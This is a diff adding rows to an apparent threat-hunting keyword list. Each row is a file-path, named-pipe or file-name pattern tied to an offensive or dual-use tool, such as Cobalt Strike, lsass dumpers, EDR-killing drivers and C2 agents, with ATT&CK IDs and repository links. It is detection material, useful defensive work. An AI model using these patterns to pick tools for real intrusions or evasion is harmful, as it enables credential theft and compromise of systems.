+"*\*.O365.GroupMembership_VPNGroups.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z"
+"*\*.O365.Roles_Admins.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z"
+"*\:MLKH*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed HKLM:\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\\.\pipe\mimi*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z"
+"*\\.\pipe\pwned/pipe/srvsvc*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","pipe name","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*\\:C*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\\??\\Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z"
+"*\\\\*\\*\\Get-FileLockProcess.ps1*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*\\\\.\\aswSP_Avar*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z"
+"*\\\\.\\pipe\\mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*\\\\.\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*\\\\127.0.0.1\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*\\127.0.0.1\c$*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*\\c$\Windows\Temp\*.dmp*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*\\DCSC_stdInPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z"
+"*\\DCSC_stdOutPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z"
+"*\\GetWebDAVStatus.exe*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z"
+"*\\pipe\\DAV RPC SERVICE*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z"
+"*\1.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\1.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\1.Encrypt_shellcode*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z"
+"*\1.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\2.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\2.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\2.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\3.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\3.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\3.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\4.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\4.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\4.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\5.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\5.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\5.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\6.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\6.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\6.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\7.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\7.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\7.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\8.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\8.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\8.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*\9.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\9.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\9.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A"
+"*\AbandonedCOMKeys.*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z"
+"*\add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z"
+"*\ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z"
+"*\ADGet.exe*","greyware_tool_keyword","adget","gather valuable informations about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z"
+"*\admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*\agent_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*\alan.log*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*\Alan.v*.zip*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*\Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z"
+"*\All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*\Andrew.dmp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z"
+"*\Angry IP Scanner.app*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*\AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z"
+"*\AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z"
+"*\AoratosWin*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z"
+"*\APCLdr.*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z"
+"*\Apollo.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*","greyware_tool_keyword","cobaltstrike","If cobaltstrike uses execute-assembly there is a chance that a file will be created in the UsageLogs logs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\AppData\Local\Temp\Procmon.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\AppData\Local\Temp\Procmon64.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\asm\x64\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*\asm\x86\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*\Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*\AtomLdr\x64*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z"
+"*\attrib.exe* +H *","greyware_tool_keyword","attrib","command aiming to hide a file. It can be performed with attrib.exe on a WINDOWS machine with command option +h ","T1562.001","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
